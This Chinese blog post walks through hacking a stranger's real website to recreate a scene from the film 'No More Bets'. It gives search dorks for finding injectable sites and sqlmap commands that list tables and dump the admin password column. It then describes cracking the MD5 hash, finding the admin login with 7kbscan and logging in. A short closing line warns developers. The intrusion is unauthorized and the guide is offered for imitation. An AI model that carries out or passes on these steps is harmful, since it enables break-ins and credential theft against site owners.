我模仿电影中的情节,成功黑进别人的网站
2024-05-06 加入收藏
大家好,我是小K,前段时间我盘点了电影《孤注一掷》中用到的技术栈:
传送门:>>> 盘点电影《孤注一掷》中的技术栈 <<<
很多小伙伴表示对当中男主潘生使用sqlmap黑掉酒店会议中的PPT后台的技术很感兴趣。
今天我带大家尽可能还原下当时潘生的操作。
为了不给别人网站造成影响,我在文章中会码掉一些敏感链接。
前期准备
一台正常使用的电脑; Python3环境; git环境
安装sqlmap工具
使用git命令安装
git clone https://github.com/sqlmapproject/sqlmap.git
选取目标站点
当前能被注入的网站基本上都是使用了比较“老”的技术,新技术实现的站点基本都有防止sql注入的安全措施。
我们可以使用百度等搜索引擎搜寻一些可能“符合目标”的站点:
inurl:?id=1
inurl:asp?id=1
inurl:php?id=1
初筛目标站点
我选取的目标站点:
我更改url中id后面的参数进浏览器,回车之后浏览器还能正常显示该网页,可能存在SQL注入漏洞。
利用漏洞
python sqlmap.py -u xxx.xxx/index.asp?id=3306-2 --tables
输入Y后回车,sqlmap将会自动尝试进行sql注入去搜索该站点在使用的关系型数据库中的表。
假如能检索到类似user,admin之类的表就注意了,管理员信息很有可能在里面!
可以使用以下命令去拿该表的字段名:
sqlmap -u xxx.xxx/index.asp?id=3306-2 -T admin --columns
再拿对应字段名对应的数据:
sqlmap -u xxx.xxx/index.asp?id=3306-2 -T admin -C password --dump
然后就可以拿到密码了。
这个站点的密码字段经过Hash,根据其长度我猜测是进行了md5哈希。便去尝试使用md5解解看。
这里我不知道password这个值是否是进行有被进行加盐,试了再说。
搜寻管理员登入站点
在此我使用的是7kbscan工具。输入url和对应的字典后,进行测试:成功拿到管理登录的入口页面。
输入拿到上文中拿到账号密码后:
后面内容进行留白处理...
最后
SQL注入攻击是一招比较老式的黑客攻击方式,现在可能对大部分站点都没用了。
但是从安全方面给网站开发人员敲响了警钟,但凡上面有一步流程走不通(例如对密码进行加盐后哈希),我们都将无法登入到管理员的站点中去。
